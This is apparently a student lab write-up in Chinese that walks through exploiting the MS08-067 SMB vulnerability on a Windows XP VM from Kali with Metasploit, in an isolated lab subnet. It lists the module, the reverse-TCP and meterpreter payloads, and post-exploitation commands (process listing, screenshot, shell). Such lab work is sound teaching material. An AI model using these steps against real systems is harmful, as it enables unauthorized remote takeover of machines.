20145329 《网络对抗技术》MS08_067远程漏洞攻击
MS08_067远程漏洞攻击:shell
实现攻击的前提是:攻击机和靶机在同一个网段下,首先将kali的ip改为与winxp的ip一样,二者能ping通

两台虚拟机:
kali ip:192.168.10.129
windows xp sp3:192.168.10.128
-
1.kali打开msfconsole控制台
-
2.在msf模式下查找ms08_067的漏洞攻击程序
![]()
-
3."use exploit/windows/smb/ms08_067_netapi"进入该漏洞模块
-
4."show payload"显示有效的攻击载荷,可以自选,以下使用generic/shell_reverse_tcp。
![]()
-
5."show targets"查看可以被攻击的靶机的操作系统型号
![]()
-
6.设置攻击有效载荷:set payload generic/shell_reverse_tcp
![]()
-
7.“show options“查看需要需要设置的数据
![]()
-
8.设置主机和靶机的ip和端口为下图所示
![]()
-
9.exploit开始攻击
![]()
-
10.获取靶机shell进行操作,与靶机本机操作结果一样
![]()
![]()
MS08_067远程漏洞攻击:meterpreter
-
1.基础设置如以上步骤一样,设置攻击载荷时改为使用meterpreter
![]()
![]()
![]()
-
2.运行exploit进行攻击
-
3.”ifconfig“查看靶机地址
![]()
-
4.“ps”查看进程
![]()
-
5.对靶机进行截屏
![]()
-
6.使用shell
![]()

















浙公网安备 33010602011771号